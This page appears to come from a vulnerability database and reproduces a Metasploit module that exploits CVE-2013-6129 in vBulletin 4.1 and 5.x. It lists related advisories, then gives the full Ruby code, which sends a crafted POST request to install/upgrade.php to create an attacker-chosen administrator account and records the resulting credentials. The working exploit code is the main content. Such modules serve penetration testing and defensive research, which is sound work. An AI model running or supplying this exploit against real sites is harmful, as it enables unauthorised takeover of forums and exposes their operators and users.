Lucene search
K

vBulletin Administrator Account Creation

🗓️ 09 Oct 2013 18:12:57Reported by Unknown, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 41 Views

vBulletin Administrator Account Creation module. Exploits vBulletin 4.1+ and 4.5+ to create new admin account. Tested on vBulletin 4.1.5 and 4.1.0

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-6129
13 Oct 201300:00
circl
Check Point Advisories
vBulletin install upgrade.php Privilege Escalation (CVE-2013-6129)
9 Jun 201400:00
checkpoint_advisories
CVE
CVE-2013-6129
19 Oct 201310:00
cve
Cvelist
CVE-2013-6129
19 Oct 201310:00
cvelist
Dsquare
vBulletin 4.1.x RCE
1 Dec 201300:00
dsquare
Dsquare
vBulletin 5.x Remote Administrator Injection
1 Dec 201300:00
dsquare
NVD
CVE-2013-6129
19 Oct 201310:36
nvd
OpenVAS
vBulletin 4.1.x, 5.x Authentication Bypass Vulnerability - Active Check
15 Nov 201300:00
openvas
Packet Storm
VBulletin Administrator Account Creation
31 Aug 202400:00
packetstorm
Packet Storm
vBulletin 4.1 Add Administrator
10 Mar 202500:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'vBulletin Administrator Account Creation',
        'Description' => %q{
          This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to
          create a new administrator account, as exploited in the wild on October 2013. This module
          has been tested successfully on vBulletin 4.1.5 and 4.1.0.
        },
        'Author' => [
          'Unknown', # Vulnerability discoverer? found in the wild
          'juan vazquez' # metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2013-6129' ],
          [ 'URL', 'http://blog.imperva.com/2013/10/threat-advisory-a-vbulletin-exploit-administrator-injection.html'],
          [ 'OSVDB', '98370' ],
          [ 'URL', 'http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5']
        ],
        'DisclosureDate' => '2013-10-09'
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'The vbulletin URI', '/']),
        OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']),
        OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password']),
        OptString.new('EMAIL', [true, 'The email for the new admin account', '[email protected]'])
      ]
    )
  end

  def user
    datastore['USERNAME']
  end

  def pass
    datastore['PASSWORD']
  end

  def run
    if user == pass
      print_error('Please select a password different than the username')
      return
    end

    print_status('Trying a new admin vBulletin account...')

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'install', 'upgrade.php'),
      'method' => 'POST',
      'vars_post' => {
        'version' => 'install',
        'response' => 'true',
        'checktable' => 'false',
        'firstrun' => 'false',
        'step' => '7',
        'startat' => '0',
        'only' => 'false',
        'options[skiptemplatemerge]' => '0',
        'reponse' => 'yes',
        'htmlsubmit' => '1',
        'htmldata[username]' => user,
        'htmldata[password]' => pass,
        'htmldata[confirmpassword]' => pass,
        'htmldata[email]' => datastore['EMAIL']
      },
      'headers' => {
        'X-Requested-With' => 'XMLHttpRequest'
      }
    })

    if res && (res.code == 200) && res.body =~ (/Administrator account created/)
      print_good("Admin account with credentials #{user}:#{pass} successfully created")
      connection_details = {
        module_fullname: fullname,
        username: user,
        private_data: pass,
        private_type: :password,
        status: Metasploit::Model::Login::Status::UNTRIED,
        proof: res.body
      }.merge(service_details)
      create_credential_and_login(connection_details)
    else
      print_error('Admin account creation failed')
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Feb 2023 14:30Current
0.6Low risk
Vulners AI Score0.6
CVSS 27.5
EPSS0.51887
41